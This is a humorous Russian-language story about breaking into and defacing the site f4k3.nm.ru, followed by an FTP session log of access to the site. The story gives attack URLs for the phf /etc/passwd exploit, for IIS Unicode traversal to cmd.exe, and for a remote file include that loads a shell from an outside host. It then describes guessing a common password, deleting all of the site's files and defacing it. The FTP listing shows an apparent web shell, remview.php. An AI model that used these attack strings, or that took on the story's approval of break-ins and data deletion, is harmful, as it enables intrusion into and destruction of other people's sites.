Как был взломан f4k3.nm.ru
==========================
Сидели мы как-то в ире, пили пиво. Делать было нечего. Решили что-нибудь
дефейсить. Тут под руку попался f4k3.nm.ru - сайт хакирской группы Network Panic
Crew.
Мы выпили еще пива и стали думать, как бы нам его дефейсить. Из всего арсенала
хакерских тулз у нас был только браузер, а это усложняло задачу. Искать
более продвинутые хакерские тулзы в поисковике жутко не хотелось - по дороге их
могли перехватить федералы, кроме того на деле они могли оказаться
разрушительной модификацией вируса OneHalf, о которой не знали наши антивирусные
средства, использующие просроченную пиратскую лицензию. Еще больше не хотелось
читать руководства по их использованию. Поэтому мы несколько раз перечитали
статью о взломе сайтов через браузер и принялись за дело.
Сначала мы набрали в браузере следующий url:
http://f4k3.nm.ru/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Но, к сожалению, сервер оказался хорошо защищен и не поддался этой атаке -
дефейсить сайт таким образом не удалось.
Мы несильно огорчились и выпили еще пива. В результате некоторой мыслительной
деятельности, было решено набрать следующее:
http://f4k3.nm.ru/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
Долбаный администратор предусмотрел и это - взломать сайт такой командой тоже не
получилось. Мы расстроились еще больше, и на этот раз выпили водки. У нас
оставался единственный выход - попытаться взломать сервер через include-bug:
http://f4k3.nm.ru/?page=http://tipa-hacka.narod.ru/shell.php?cmd=id
Но и на этот раз фортуна не улыбнулась гнилыми зубами. Поняв, что взломать этот
сайт не удастся, мы оставили его.
Спустя две недели, мы узнали о списке наиболее распространенных паролей:
love
sex
god
qweasdzxc
Мы стали поочередно вводить пароли и смотреть результат. И как по мановению
волшебной палочки, пароль ``qweasdzxc'' подошел, и мы получили полный доступ к
сайту f4k3.nm.ru
Сперва мы решили почистить логи - для нашей же безопасности. Поскольку мы не
знали, где точно находятся логи, было решено удалить все файлы на сайте, что и
было сделано при помощи дружественного web-интерфейса. Затем мы решили
приступить собственно к дефейсу - через web-интерфейс мы создали файл index.htm
и поместили туда всего одну строчку - ``dephaced'' [ потому что plain-text
дефейс намного илитней чем красочный html а-ля DHG ]. После этого мы поменяли
пароль и другую информацию о сайте, и завершили сеанс. Оставалось сделать самое
главное в дефейсинге - сообщить о факте взлома на void.ru, что и было с
легкостью осуществлено.
Спустя пол-часа сайт был редефейсен неизвестными людьми, вместо нашей строчки
появилась другая:
0xd3f4c3d 8y m4d 0hd4y 0wn3rz [ m00 ] v14 un1k0d3 8ug h4h4
Конец.
Name (ftp.newmail.ru:root): [email protected]
331 User f4k3 OK. Password required.
Password:
530 Sorry, f4k3
Login failed.
ftp> user f4k3.nm.ru
331 User f4k3.nm.ru OK. Password required.
Password:
230 OK. Current directory is /
ftp> ls -la
total 1
drwxr-xr-x 4 15229 503 4096 Apr 17 20:43 .
drwxr-xr-x 4 15229 503 4096 Apr 17 20:43 ..
-rw-r--r-- 1 15229 501 1007 Jan 3 22:30 STYLE.CSS
-rw-r--r-- 1 15229 501 10386 Oct 26 2003 a00.txt
-rw-r--r-- 1 15229 501 12735 Oct 24 2003 b00.txt
-rw-r--r-- 1 15229 501 33040 Apr 8 22:58 d6v2.txt
-rw-r--r-- 1 15229 501 99580 Jan 1 13:02 defaced4.win.rar
-rw-r--r-- 1 15229 501 34922 Apr 11 18:21 electron.log
drwxrwxrwx 2 15229 501 4096 Jan 3 21:30 img
-rw-r--r-- 1 15229 501 48243 Apr 17 20:42 img1.jpg
-rw-r--r-- 1 15229 501 50184 Apr 17 20:43 img2.jpg
-rw-r--r-- 1 15229 501 1253 Jan 3 22:30 index.htm
-rw-r--r-- 1 15229 501 8389 Jan 20 14:41 lol.html
-rw-r--r-- 1 15229 501 33473 Oct 24 2003 mysql.htm
drwxr-xr-x 2 15229 503 4096 Oct 5 2003 rem
-rw-r--r-- 1 15229 501 93596 Nov 17 2003 screen.gif
-rw-r--r-- 1 15229 501 82266 Dec 24 16:09 screen.jpg
-rw-r--r-- 1 15229 501 2362 Nov 22 2003 skaZZ.txt
226-Options: -a -l
226 18 matches total
ftp> cd rem
250 Changed to /rem
ftp> ls
total 1
drwxr-xr-x 2 15229 503 4096 Oct 5 2003 .
drwxr-xr-x 4 15229 503 4096 Apr 17 20:43 ..
-rw-r--r-- 1 15229 501 90895 Oct 5 2003 remview.php
-rw-r--r-- 1 15229 501 90895 Oct 5 2003 remview.txt
-rw-r--r-- 1 15229 501 38 Oct 5 2003 shell.txt
226-Options: -a -l
226 5 matches total
ftp> cd ../img
250 Changed to /img
ftp> ls -la
total 1
drwxrwxrwx 2 15229 501 4096 Jan 3 21:30 .
drwxr-xr-x 4 15229 503 4096 Apr 17 20:43 ..
-rw-rw-rw- 1 15229 501 12288 Jan 3 14:04 Thumbs.db
-rw-rw-rw- 1 15229 501 48428 Jan 3 12:45 face.jpg
-rw-rw-rw- 1 15229 501 24033 Jan 3 14:43 logo.jpg
226-Options: -a -l
226 5 matches total